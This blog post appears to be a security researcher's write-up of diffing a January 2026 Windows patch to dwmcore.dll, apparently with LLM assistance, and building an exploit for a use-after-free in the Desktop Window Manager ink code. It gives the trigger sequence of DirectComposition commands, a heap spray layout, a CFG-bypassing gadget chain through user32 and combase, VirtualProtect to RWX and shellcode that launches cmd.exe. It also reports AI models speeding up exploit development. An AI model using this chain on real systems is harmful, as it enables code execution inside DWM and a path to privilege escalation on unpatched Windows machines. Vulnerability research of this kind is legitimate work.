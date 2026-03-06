Intro

Patch diffing has long fascinated me. I think part of it has to do with the race against the clock, reversing, exploiting, and trying to attain that “1day” exploit status. For advanced Windows targets, Valentina Palmiotti and Ruben Boonen proved that this was already possible nearly 3 years ago. But, they are some of the world's most talented exploit devs. Can LLMs raise the capability floor for us mere mortals? Fortunately, and maybe a bit alarmingly, the answer is yes.

The Hunt

When the bulletin for the January 2026 Patch Tuesday dropped, I kicked off my search to identify one of the patched vulnerabilities, and (hopefully) develop a working exploit for it. Top on the target list were any vulnerabilities already known to be exploited in the wild. January patches included an in-the-wild information leak vulnerability in Desktop Window Manager (DWM), which caught my eye. It also included a second DWM vulnerability which could lead to local privilege escalation. Historically, DWM has been a popular target for local privilege escalation. Sometimes it can be tricky to identify the exact patched component, but for DWM, dwmcore.dll is always a safe bet.

After training Ghidra on the files and extracting BSim vectors for every function, it becomes quite easy to highlight the differences between them. Not to mention, many Microsoft-patched vulnerabilities come alongside new feature flags. Needless to say, Opus 4.5 made quick work of the diff and identified one of the vulnerabilities within minutes.

====================================================================== BSim PATCH DIFF REPORT ====================================================================== File 1: dwmcore_vuln.dll File 2: dwmcore_patched.dll ====================================================================== ---------------------------------------------------------------------------------------------------- TOP 10 MOST MODIFIED FUNCTIONS ---------------------------------------------------------------------------------------------------- dwmcore_vuln.dll dwmcore_patched.dll Sim Jaccard ---------------------------------------------------------------------------------------------------- FUN_1802e7842 FUN_1802e7842 0.1191 0.0632 FUN_1802e92d6 FUN_1802e92d6 0.1470 0.0722 FUN_1802e5faa FUN_1802e5faa 0.1741 0.0769 ~CDelegatedInkCanvas ~CDelegatedInkCanvas 0.7556 0.6047 GetBufferedOutputTransformed GetBufferedOutputTransformed 0.7628 0.6154 FrameStarted FrameStarted 0.7833 0.6429 ~CSynchronousSuperWetInk ~CSynchronousSuperWetInk 0.8018 0.6667 FUN_1802f5aa2 FUN_1802f5aa2 0.9127 0.8393 FUN_1802f57d2 FUN_1802f5d72 0.9127 0.8393 ======================================================================

From here, I have to say that the time to build a functional exploit was painfully slower than I would have hoped. I spent many long nights and weekends poking and prodding the model along. A lot of this came down to my own unfamiliarity with the bug class and subsystem. Eventually, we did prevail and get RCE from low privilege into DWM and to SYSTEM. In the process, I discovered multiple novel exploitation techniques, like the GetRECT spray, new gadget chains, and a DWM-to-SYSTEM path. However, with these techniques (and some other tooling) in hand and newer model releases like Opus 4.6, the time from discovering a UAF vulnerability in DWM to functional exploit dropped from 3 weeks to a matter of hours.

The Bug

The vulnerability is a Use-After-Free in CSynchronousSuperWetInk::~CSynchronousSuperWetInk . The destructor conditionally removes the object from CSuperWetInkManager based on the return value of IsSuperWetCompatible() .

void CSynchronousSuperWetInk::~CSynchronousSuperWetInk(CSynchronousSuperWetInk *this) { this->vtable = &_vftable_; bool bVar2 = IsSuperWetCompatible(this); if (bVar2) { CSuperWetInkManager::RemoveSource(this->composition->superWetInkManager, this); } // ... cleanup continues }

The vulnerable destructor in dwmcore.dll version 10.0.26100.7309.

IsSuperWetCompatible Condition

bool CSynchronousSuperWetInk::IsSuperWetCompatible(CSynchronousSuperWetInk *this) { if ((this->LookupMode == 2 || this->notifier1 != NULL) && this->clipEntry != NULL && this->comObject != NULL) { return true; } return false; }

The IsSuperWetCompatible condition in dwmcore.dll version 10.0.26100.7309.

The function returns true only when LookupMode equals 2, or notifier1 is set, AND both clipEntry and comObject are non-null.

The Bug

An attacker can:

Register a CSynchronousSuperWetInk with the manager (requires LookupMode=2 during Draw() ) Change LookupMode to 0 via CMD_SET_PROPERTY Trigger destruction via CMD_RELEASE_RESOURCE IsSuperWetCompatible() returns FALSE → RemoveSource() is skipped A dangling pointer remains in CSuperWetInkManager::localStrokesVector

When DWM later iterates this vector (e.g., in DirtyActiveInk ), it dereferences the freed object's vtable, leading to controlled code execution.

The Fix

The patch adds a feature flag ( Feature_1732988217 ). When enabled, RemoveSource() is called unconditionally, regardless of IsSuperWetCompatible() . This ensures the object is always properly unregistered from the manager during destruction, eliminating the dangling pointer.

void CSynchronousSuperWetInk::~CSynchronousSuperWetInk(CSynchronousSuperWetInk *this) { *(undefined ***)this = &_vftable_; bool bVar2 = wil::details::FeatureImpl<Feature_1732988217>::__private_IsEnabled(&impl); if (!bVar2) { bVar2 = IsSuperWetCompatible(this); if (!bVar2) goto LAB_1802a9b1a; // Skip RemoveSource only if feature disabled AND !compatible } CSuperWetInkManager::RemoveSource(..., this); LAB_1802a9b1a: // ... cleanup continues }

The fixed destructor in dwmcore.dll version 10.0.26100.7623.

The Exploit

The UAF can be triggered from a regular user-mode application via the DirectComposition API. The attack requires no special privileges.

Prerequisites

D3D11/DXGI Infrastructure: Create a D3D11 device with BGRA support and a swap chain for a visible window. DirectComposition Device: Initialize via DCompositionCreateDevice() with the DXGI device. NtDComposition Syscall Access: Hook or directly call NtDCompositionProcessChannelBatchBuffer and NtDCompositionCommitChannel via win32u.dll to inject raw batch buffer commands.

Trigger Sequence

Step 1: Create Ink Trail (Allocate CSynchronousSuperWetInk)

Query IDCompositionInkTrailDevice from the DirectComposition device, then call CreateDelegatedInkTrailForSwapChain() or CreateDelegatedInkTrail() . This allocates a CSynchronousSuperWetInk object (resource type 0xa8 ) in dwm.exe's heap.

Step 2: Create Visual and Set LookupMode=2

Inject batch buffer commands to:

Create a CSuperWetInkVisual (type 0xa5 ) with CMD_CREATE_RESOURCE (0x02) Connect visual to ink source: CMD_SET_REFERENCE (0x10) with propId 0x34 Set LookupMode=2 on the ink source via CMD_SET_PROPERTY (0x0B) with propId 10 Connect to composition tree: CMD_SET_REFERENCE to handles 1 and 2 (composition target / marshaler) with propId 0x34

LookupMode=2 ensures IsSuperWetCompatible() returns TRUE during Draw() , which registers the object with CSuperWetInkManager::localStrokesVector .

Step 3: Render Frames to Register with Manager

Present multiple frames ( IDXGISwapChain::Present ) and commit DirectComposition changes. This triggers DWM's render loop, which calls into the ink infrastructure and registers the CSynchronousSuperWetInk pointer in the manager's internal vector.

Step 4: Set LookupMode=0 (Bypass Removal Check)

Inject CMD_SET_PROPERTY to change LookupMode to 0 . Now IsSuperWetCompatible() will return FALSE because:

if ((this->LookupMode == 2 || this->notifier1 != NULL) && ...)

With LookupMode = 0 and no notifier, the first condition fails.

Step 5: Release Ink Trail (Create Dangling Pointer)

Disconnect visual references: CMD_SET_REFERENCE with refHandle=0 for all connections Release the IDCompositionDelegatedInkTrail interface

When the destructor ~CSynchronousSuperWetInk runs:

It calls IsSuperWetCompatible() which returns FALSE (LookupMode=0)

which returns (LookupMode=0) RemoveSource() is SKIPPED

is The object is freed but its pointer remains in CSuperWetInkManager::localStrokesVector

Step 6: Trigger DirtyActiveInk (Use-After-Free)

Continue presenting frames and invalidating the window. DWM's composition loop calls CSuperWetInkManager::DirtyActiveInk() , which iterates localStrokesVector and dereferences the dangling pointer:

pcVar2 = *(code **)((longlong)((CResource *)*puVar4)->vtable + 0x50);

Crash Behavior

Without a heap spray, DWM crashes when accessing freed memory:

# Call Site 00 ntdll!KiUserExceptionDispatch 01 0x00007ffe`f23270d1 02 dwmcore!CSuperWetInkManager::DirtyActiveInk+0xae 03 dwmcore!CComposition::PreRender+0x99f 04 dwmcore!CComposition::ProcessComposition+0x1d7 05 dwmcore!CConnection::MainCompositionThreadLoop+0x4a

If the freed memory is reclaimed by another object (e.g., CInteractionTrackerScaleAnimation ), the crash occurs at an unexpected vtable:

kd> dps rcx 00000201`fbef65f0 00007ffe`ebf60014 dwmcore!CInteractionTrackerScaleAnimation::`vftable'+0x24

By controlling what data reclaims the freed allocation, an attacker can craft a fake vtable and achieve arbitrary code execution via the virtual call at vtable+0x50 .

Heap Spray

To exploit the UAF, we must reclaim the freed CSynchronousSuperWetInk allocation with attacker-controlled data containing a fake vtable. This section documents the CRegionGeometry RECT buffer spray technique we refer to as GetRECT.

Target Object Properties

Property Value Object CSynchronousSuperWetInk Size 0x120 (288 bytes) Allocator DefaultHeap::AllocClear → GetProcessHeap() LFH Bucket 34 (273-288 byte range) Slots per Subsegment 57

Spray Primitive: CRegionGeometry RECT Buffer

The spray uses CRegionGeometry resources (type 0x81 ) with RECT array data:

Property Value Resource Type 0x81 (CRegionGeometry) Spray Size 18 RECTs × 16 bytes = 288 bytes Allocator std::_Allocate<16> → HeapAlloc(GetProcessHeap(), 0, 288) LFH Bucket 34, same as target Content Control 72 int32 values (18 RECTs × 4 fields)

Allocation Chain:

dcomp.dll: SetRectangles → ResourceSetBufferPropertyCustomWrite win32kbase: CRegionGeometryMarshaler::SetBufferProperty → CMarshaledArray::Copy dwmcore.dll: SetRectangles → std::vector::_Insert_counted_range → std::_Allocate<16> → HeapAlloc(GetProcessHeap(), 0, 288)

The RECT buffer is written via CMD_SET_BUFFER_PROPERTY (0x0F) with propId 5 :

struct CmdSetResourceBufferProperty { uint32_t cmdId; // 0x0F uint32_t handle; // Resource handle uint32_t propId; // 5 for RECT array uint32_t dataSize; // 288 for 18 RECTs // Variable-length RECT data follows (4-byte aligned) };

RECT Layout for Fake Object

The 18 RECTs (288 bytes) provide full control over the reclaimed memory:

struct SprayRECT { int32_t left; // +0x00 within RECT int32_t top; // +0x04 int32_t right; // +0x08 int32_t bottom; // +0x0C }; // Total: 72 int32 values = complete coverage of CSynchronousSuperWetInk fields // Key offsets for exploit: // +0x00: fake vtable pointer (RECT[0].left/top)

Helper to write 64-bit values into adjacent RECT fields:

static void SetU64(int32_t* lo, int32_t* hi, uint64_t val) { *lo = (int32_t)(val & 0xFFFFFFFF); *hi = (int32_t)(val >> 32); }

Exploitation Primitive

The UAF gives us a controlled vtable call with RCX pointing to our sprayed object. When DirtyActiveInk iterates the dangling pointer:

pcVar2 = *(code **)((longlong)((CResource *)*puVar4)->vtable + 0x50); (*pcVar2)(); // call [[spray]+0x50] with RCX = spray

Call site stack:

00 dwmcore!CSuperWetInkManager::DirtyActiveInk+0xa9 01 dwmcore!CComposition::PreRender+0x99f 02 dwmcore!CComposition::ProcessComposition+0x1d7 03 dwmcore!CConnection::MainCompositionThreadLoop+0x4a 04 dwmcore!CConnection::RunCompositionThread+0x142 05 KERNEL32!BaseThreadInitThunk+0x17 06 ntdll!RtlUserThreadStart+0x2c

Register state at dispatch:

RCX = pointer to sprayed object (our controlled 288 bytes)

= pointer to sprayed object (our controlled 288 bytes) RIP = [[spray]+0x50] (function pointer from fake vtable)

Target Function Constraints

There are initially two restrictions on what we can call:

The target must be in the CFG bitmap (marked as valid call target) The target must have a pointer to it (in IAT, vtable, or other readable memory)

We cannot directly call arbitrary addresses; only functions that satisfy both conditions.

Gadget Chain: __fnINSTRING + CStdAsyncStubBuffer2_Disconnect

With the UAF giving us a controlled vtable call ( RIP = [[spray]+0x50] , RCX = spray ), the remaining challenge is chaining CFG-valid gadgets to achieve arbitrary code execution. Direct shellcode execution is blocked by CFG, and we have no heap address leak. We developed a novel gadget chain that solves both problems to achieve code execution, but it required 2 successful exploit attempts, lowering the reliability. Therefore, we pivoted to a known public technique using two Windows system DLL gadgets: __fnINSTRING (user32.dll) and CStdAsyncStubBuffer2_Disconnect (combase.dll).

Stage 1: __fnINSTRING - Kernel Callback Dispatch Without a Leak

The Windows kernel communicates back to user mode through the KernelCallbackTable (KCT), a function pointer table stored in the PEB at offset +0x58 . Each entry points to a __fn* handler in user32.dll . These functions are CFG-valid call targets and have pointers to them in readable memory (the KCT itself), satisfying both constraints.

We point the fake vtable at &KCT[fnINSTRING_index] - 0x50 . When DirtyActiveInk dereferences [[spray]+0x50] , it reads the KCT entry and dispatches to __fnINSTRING :

[[spray]+0x50] = [KCT_entry_addr - 0x50 + 0x50] = [KCT_entry_addr] = &__fnINSTRING

What makes this useful is what __fnINSTRING does internally. It treats its argument (our spray buffer) as a _CAPTUREBUF structure and calls FixupCallbackPointers before dispatching the inner function. FixupCallbackPointers reads a fixup table from the buffer and converts relative offsets into absolute addresses by adding the buffer's base address:

// Simplified FixupCallbackPointers logic: void FixupCallbackPointers(_CAPTUREBUF* buf) { if (buf->guard != 0) return; // already fixed up - skip int32_t* fixups = (int32_t*)((char*)buf + buf->fixupTableOffset); for (int i = 0; i < buf->fixupCount; i++) { int32_t* target = (int32_t*)((char*)buf + fixups[i]); *(uint64_t*)target += (uint64_t)buf; // relative → absolute } }

This eliminates the need for a heap address leak. We embed relative offsets in the spray buffer, and FixupCallbackPointers patches them to absolute pointers at runtime using the buffer's own address. After fixup, __fnINSTRING dispatches the inner function pointer at +0x48 with the arguments at +0x28 (RCX), +0x30 (EDX), +0x38 (R8), and +0x50 (R9).

We set the inner function to CStdAsyncStubBuffer2_Disconnect .

Stage 2: CStdAsyncStubBuffer2_Disconnect - Two Chained Vtable Calls

CStdAsyncStubBuffer2_Disconnect is exported from combase.dll , making it CFG-valid with a stable address. Its disassembly reveals a useful primitive: two sequential vtable dispatches with preserved argument registers:

; CStdAsyncStubBuffer2_Disconnect (simplified) MOV RBX, RCX ; save this MOV RCX, [RCX-8] ; load [this-8] -> fake_obj_1 TEST RCX, RCX JZ skip1 MOV RAX, [RCX] ; vtable MOV RAX, [RAX+0x20] ; vtable[4] CALL guard_dispatch_icall ; CALL #1: [[this-8]+0x20] ← VirtualProtect skip1: XOR ECX, ECX XCHG [RBX+0x10], RCX ; DEFUSE: read [this+0x10], zero it TEST RCX, RCX JZ skip2 MOV RAX, [RCX] ; vtable MOV RAX, [RAX+0x10] ; vtable[2] CALL guard_dispatch_icall ; CALL #2: [[[this+0x10]]+0x10] ← shellcode skip2: ADD RSP, 0x20 POP RBX RET

RDX , R8 , and R9 are preserved through both calls, arriving untouched from __fnINSTRING 's argument setup. This gives us full control over the first three arguments to both vtable calls.

Vtable Call #1: VirtualProtect → RWX

We construct a self-referential fake object at +0xC8 in the spray buffer: [+0xC8] points to itself (after fixup), so dereferencing [RCX] → [RCX+0x20] reads VirtualProtect 's address from +0xE8 . The arguments (preserved from __fnINSTRING dispatch) are:

Register Value Purpose RCX base+0xC8 (fake_obj_1) lpAddress (start of spray buffer region) RDX 0x1000 dwSize R8 0x40 flNewProtect ( PAGE_EXECUTE_READWRITE ) R9 base+0xC0 lpflOldProtect (output slot in spray buffer)

After this call, the spray buffer's memory page is marked RWX, and the CFG bitmap is updated to allow execution from this region.

Vtable Call #2: Inline Shellcode

After VirtualProtect returns, Disconnect loads [this+0x10] into RCX for the second vtable dispatch:

XOR ECX, ECX XCHG [RBX+0x10], RCX ; RCX = [base+0x90] = base+0xA0 (fake_obj_2) TEST RCX, RCX JZ skip2 ; non-zero → take the call MOV RAX, [RCX] ; RAX = [base+0xA0] = base+0xA8 (fake vtable_2) MOV RAX, [RAX+0x10] ; RAX = [base+0xB8] = base+0xD0 (shellcode!) CALL guard_dispatch_icall ; call base+0xD0

The pointer chain resolves step by step:

[this+0x10] = [base+0x90] = base+0xA0 (fake_obj_2) [RCX] = [base+0xA0] = base+0xA8 , fake_obj_2's vtable pointer (after fixup) [RAX+0x10] = [base+0xB8] = base+0xD0 , vtable_2's third entry, pointing at our shellcode

The final CALL guard_dispatch_icall dispatches to base+0xD0 , our inline shellcode, now both executable and CFG-valid thanks to the preceding VirtualProtect call.

Shellcode Layout

The shellcode is split into two phases because the VirtualProtect address data sits at +0xE8 (used as vtable_1[0x20] by call #1), creating a gap in the middle of our executable region:

Phase 1 (+0xD0, 22 bytes): Saves RCX (base+0xA0) into RBX for later address arithmetic, allocates shadow space, loads SW_SHOW (5) into RDX , loads the absolute address of WinExec via movabs RAX , then jumps over the 8-byte data gap at +0xE8 :

mov rbx, rcx ; save base+0xA0 for address math sub rsp, 0x28 ; shadow space push 5 pop rdx ; uCmdShow = SW_SHOW movabs rax, <WinExec addr> ; 10-byte immediate load jmp +0x0A ; skip over +0xE8 data → land at +0xF0

Phase 2 (+0xF0): Calls WinExec with a RIP -relative pointer to the "cmd.exe\0" string embedded at the end of the shellcode, defuses the spray for safe re-entry, then performs a stack fixup to return directly to DWM's composition loop:

lea rcx, [rip+0x22] ; rcx = &"cmd.exe" call rax ; WinExec("cmd.exe", SW_SHOW) ; Defuse: rewrite fake vtable so re-entry is harmless lea rax, [rbx+0x78] ; rax = address of the ret below mov [rbx-0x48], rax ; [base+0x58] = ret_gadget lea rax, [rbx-0x98] ; rax = base+0x08 mov [rbx-0xA0], rax ; [base+0x00] = base+0x08 (new fake vtable) ; Stack fixup: skip Disconnect + __fnINSTRING return frames add rsp, 0xB8 ; 0x28 shadow + 0x90 to unwind past intermediate frames xor eax, eax ; zero return value ret ; return directly to DWM composition loop ; "cmd.exe\0" embedded here

The add rsp, 0xB8 improves reliability. A naive add rsp, 0x28 would return into CStdAsyncStubBuffer2_Disconnect , which would then return into __fnINSTRING , which calls NtCallbackReturn . This kernel callback return path can be fragile in the context of a hijacked call. By adding an extra 0x90 to the stack adjustment, the shellcode skips past both intermediate frames entirely and returns directly to DirtyActiveInk 's caller in the DWM composition loop.

Safe Re-entry: Defusing the Spray

DWM's DirtyActiveInk may iterate the dangling pointer more than once. Without defusing, each re-entry would re-trigger the full chain and crash. The shellcode rewrites the spray's vtable pointer so that subsequent dereferences take a harmless path:

[base+0x00] is overwritten to base+0x08 (new fake vtable) [base+0x58] is overwritten to the address of a ret instruction

On re-entry: [[base+0x00]+0x50] = [base+0x08+0x50] = [base+0x58] = ret . The vtable call returns immediately. __fnINSTRING is never re-invoked because the vtable no longer points at the KCT entry.

Complete Spray Layout

The full 288-byte spray buffer (18 RECTs) after FixupCallbackPointers :

Offset Size Content Purpose +0x00 8 KCT_entry - 0x50 Fake vtable → __fnINSTRING +0x08 4 8 Fixup count +0x18 4 0x58 Fixup table offset +0x20 8 base (fixup'd) Guard (blocks re-fixup) +0x28 8 base+0x80 (fixup'd) RCX → Disconnect this +0x30 4 0x1000 EDX → VirtualProtect dwSize +0x38 8 0x40 R8 → PAGE_EXECUTE_READWRITE +0x48 8 &Disconnect Inner function pointer +0x50 8 base+0xC0 (fixup'd) R9 → lpflOldProtect +0x58 32 fixup table (8 entries) Offsets to patch +0x78 8 base+0xC8 (fixup'd) [this-8] → fake_obj_1 +0x80 8 (unused) Disconnect this base +0x90 8 base+0xA0 (fixup'd) [this+0x10] → fake_obj_2 +0xA0 8 base+0xA8 (fixup'd) fake_obj_2 vtable +0xB8 8 base+0xD0 (fixup'd) vtable_2[0x10] → shellcode +0xC0 4 (output) VirtualProtect lpflOldProtect +0xC8 8 base+0xC8 (fixup'd) Self-referential vtable (fake_obj_1) +0xD0 22 shellcode phase 1 Save regs, load WinExec, jmp +0xE8 8 &VirtualProtect vtable_1[0x20] data +0xF0 48 shellcode phase 2 WinExec + defuse + stack fixup + "cmd.exe\0"

Full Chain Summary

DirtyActiveInk iterates dangling pointer → [[spray+0x00]+0x50] = __fnINSTRING(spray) → FixupCallbackPointers: 8 relative offsets → absolute → Dispatch: CStdAsyncStubBuffer2_Disconnect(base+0x80, 0x1000, 0x40, base+0xC0) → Vtable call #1: VirtualProtect(base+0xC8, 0x1000, RWX, base+0xC0) → Spray buffer page is now RWX, CFG bitmap updated → Vtable call #2: shellcode at base+0xD0 → WinExec("cmd.exe", SW_SHOW) → Defuse: rewrite vtable for safe re-entry → Stack fixup: add rsp, 0xB8 to skip Disconnect + __fnINSTRING frames → RET directly to DWM composition loop → DirtyActiveInk re-entry: [[base]+0x50] = ret → clean return

The DWM process runs as the DWM user with System integrity. Prior public techniques to achieve SYSTEM typically involve hijacking function pointers mapped into privileged client processes like LogonUI or Consent. However, it appears this technique was recently patched as the shared section is now mapped read-only. We developed a new, alternative path to SYSTEM but are choosing to withhold publishing the technique at this time.

Closing Thoughts

The models we have today are highly capable at tasks that historically have required deep expertise cultivated over many years. This includes things like reverse engineering, vulnerability discovery, and exploit development. Their capabilities are spiky, and do not yet rival the world's best in these fields. However, the march of model progress seems to show no sign of slowing down at the moment. This levels the playing field for defenders, but also raises the capabilities of attackers. While there has always been an adversarial cat and mouse game, and this is not new in that regard, attackers are at least at a near-term asymmetric advantage to wield these tools for harm. Attackers can move faster, with little worry about safety or security of AI systems. Defenders must leverage AI for offensive purposes against their code (for vulnerabilities), security products (for detection gaps), and their enterprises (adversary emulation) to find weaknesses and iterate on improved defenses before attackers do. Unfortunately, it may be the small organizations with no security teams that take the brunt of the near term pain. My hope is that long-term, the security community can together outspend attackers on offensive and defensive research, and we exit this era in a better place than we started.